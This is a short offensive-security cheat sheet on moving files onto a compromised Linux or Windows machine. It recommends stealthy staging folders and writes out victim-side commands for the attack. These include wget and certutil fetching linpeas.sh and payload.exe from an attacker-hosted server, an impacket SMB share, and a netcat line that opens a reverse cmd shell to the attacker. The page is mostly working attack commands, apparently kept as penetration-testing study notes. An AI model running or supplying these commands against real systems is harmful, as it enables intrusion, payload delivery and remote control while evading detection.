File Transfer
- On Linux, transfer files to
/dev/shm - On Windows, transfer files to
C:\Windows\Tasks
They are chosen to be the locations for file transfer because they are world-readable/writable/executable and more stealthy than
/tmp and C:\Windows\Temp.On attack machine, host a server:
updog
On victim machine, download with
wget:wget http://<local_ip>/linpeas.sh
On attack machine, host a server:
updog
On victim machine, download with
certutil:certutil -urlcache -f http://<local_ip>/payload.exe payload.exe
If
certutil is not on the compromised Windows machine, we can transfer files with SMB server instead.On Kali, create a SMB server:
impacket-smbserver ret2basic /usr/share/windows-resources/binaries/
Here
ret2basic is the name of the share and /usr/share/windows-resources/binaries/ is the directory that I want to host. On the compromised Windows machine:net use * \\<local_ip>\ret2basic
Z:\nc.exe <local_ip> <local_port> -e cmd
Last modified 9mo ago